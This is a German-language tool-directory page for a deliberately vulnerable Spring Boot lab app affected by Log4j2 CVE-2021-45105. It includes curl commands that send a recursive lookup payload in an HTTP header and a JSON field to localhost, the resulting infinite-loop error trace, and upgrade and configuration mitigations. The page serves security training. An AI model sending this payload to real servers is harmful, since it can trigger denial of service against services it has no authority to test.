Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j2-CVE-2021-45105 — # Beispiel-Webanwendung mit Spring Boot, anfällig für Log4j2 CVE-2021-45105, mit dokumentierten Ausnutzungsschritten und Minderungsanleitung für Sicherheitstests und Schulungszwecke. | Kitploit
Tools/GitHubGitHub/pravin-pp/log4j2-cve-2021-45105
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubpravin-pp/log4j2-cve-2021-45105

log4j2-CVE-2021-45105

# Beispiel-Webanwendung mit Spring Boot, anfällig für Log4j2 CVE-2021-45105, mit dokumentierten Ausnutzungsschritten und Minderungsanleitung für Sicherheitstests und Schulungszwecke.

Repository anzeigen
2vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Verwundbare Log4j2-Beispielanwendung (CVE-2021-45105)

Betroffene Versionen: alle Versionen von 2.0-beta9 bis 2.16.0

Diese Anwendung basiert auf einer Spring-Boot-Webanwendung, die anfällig für CVE-2021-45105 ist.

Sie verwendet Log4j 2.16.0.

Ausführen der Anwendung

Führen Sie es aus:

root@kitploit:~
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

Ausnutzungsschritte

  • Lösen Sie dann den Exploit wie folgt aus:
root@kitploit:~
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
  • Beachten Sie die Ausgabe, die eine Endlosschleife zeigt. In Tests wurde jedoch nicht festgestellt, dass dieser DoS ressourcenintensiv ist, da diese Endlosschleife vom Programm erkannt wird und mit einem Fehler endet:
root@kitploit:~

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	

Gegenmaßnahmen :

Java-8-Benutzer (oder höher) sollten auf Version 2.17.0 aktualisieren.

Alternativ kann dies in der Konfiguration entschärft werden:

Ersetzen Sie im PatternLayout der Logging-Konfiguration Context Lookups wie ${ctx:loginId} oder $${ctx:loginId} durch Thread Context Map-Muster (%X, %mdc oder %MDC). Andernfalls entfernen Sie in der Konfiguration Verweise auf Context Lookups wie ${ctx:loginId} oder $${ctx:loginId}, wenn diese aus Quellen außerhalb der Anwendung stammen, wie z. B. HTTP-Header oder Benutzereingaben.

Tool herunterladen